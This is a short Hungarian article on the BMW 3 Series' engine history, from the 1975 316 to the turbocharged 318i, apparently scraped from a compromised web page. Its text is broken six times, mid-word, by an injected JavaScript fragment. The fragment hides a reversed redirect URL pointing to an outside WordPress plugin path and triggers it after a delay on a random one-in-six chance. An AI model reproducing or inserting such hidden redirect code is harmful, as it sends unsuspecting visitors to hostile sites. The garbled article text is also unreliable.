1975 júliusában mutatták be a Müncheni Olimpiai Stadionban az első generációs 3-as BMW-t. A kezdeti alapmodell a 100 lovas 316-os volt 14 másodperces 100-as sprinttel és 160 km/órás végsebességgel. 2012-ben került először turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor a 3-as alapmodelljébe, mégpedig az N13B16-os négyhengeres 136 lóerővel (316i). Ezt váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}totta a modellfrissítéssel az azonos teljesítményű 1,5 literes, háromhengeressel a BMW (318i). Járáskultúrája és presztízse miatt sem volt népszerű a háromhengeres 3-as, ezért ezt a hibát nem követik el ismét. A 318i újra négyhengeres motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tort kap. 2 literes, négyhengeres turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor 156 lóerős, 250 Nm nyomatékot tudó váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozata kerül a 318i-be. A 8 sebességes autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomataváltó az alapfelszereltség…
- Hirdetés -